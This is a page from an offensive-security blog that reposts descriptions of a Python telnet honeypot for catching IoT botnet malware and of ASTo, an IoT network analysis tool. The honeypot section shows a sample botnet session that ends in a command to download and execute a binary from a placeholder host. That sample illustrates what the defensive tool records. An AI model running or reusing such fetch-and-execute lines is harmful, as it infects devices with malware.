Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label IoT. Show all posts
Showing posts with label IoT. Show all posts

Sunday, December 31, 2017

Python Telnet Honeypot For Catching Botnet Binaries - Telnet IoT Honeypot


This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet.
Other than https://github.com/stamparm/hontel or https://github.com/micheloosterhof/cowrie (examples), which provides full (via chroot) or simulated behaviour of a linux system this honeypots goal is just to collect statistics of (IoT) botnets. This means that the honeypot must be made to work with every form of automated telnet session, which may try to infect the honeypot with malware. Luckily, these malwares infection processes are quite simple, just using wget do download something and running it.

Architekure
The application has a client/server architekture, with a client (the actual honeypot) accepting telnet connections and a server aggregating connection data and sample analysis.
However, for local deployments, the application can also be run in local mode to eliminate the need to run a client and server locally.

Running
The application has a config file named config.py. Samples are included for local and client/server deployments.

Client/Local Mode
python honey.py

Server
python backend.py

Opening the frontend
After the server is started, open html/index.html in your favorite browser. For this to work, the url in html/apiurl.js should point to your running backend, which it should do automatically for local deployments.

Sample Connection
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit 

Images


Share:

Thursday, September 21, 2017

An IoT Network Security Analysis Tool and Visualizer - ASTo


ASTo is security analysis tool for IoT networks. It is developed to support the Apparatus security framework. ASTo is based on electron and cytoscape.js. The icons are provided by Google's Material Design.

The application is still in prototyping stage, which means a lot of functionality is being added with each commit, along with massive changes in almost everything.

Screenshots



To Use
To clone and run this repository you'll need Git and Node.js installed on your computer. To download and install the app, type the following in your terminal:
# Clone this repository
git clone https://github.com/Or3stis/apparatus.git
# Go into the repository
cd apparatus
# Install dependencies
npm install
# to run the app
npm start
Because the app is still in prototype stage, it is best to keep up to date with the most recent commits. To do so, before starting the app, type:
# inside the apparatus directory

# update to latest
git pull
The first window (home screen) will ask you to choose which modeling phase would you like to perform analysis in. After you select a phase, a native dialog window will be displayed and ask you choose a file to load. By default, you can only choose .js or .json files.
You will find some example graphs in the graphs folder.

Instructions

If you want to contribute that's great news. Check the contributing guide. The application is being developed on Mac. That means that new commits might introduce breaking changes in other platforms. Especially commits that involve access to the file system. If something is not working, don't hesitate to create an issue.
If you want to find out how the app works check the wiki.
You can check the project's planned features in the roadmap.


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition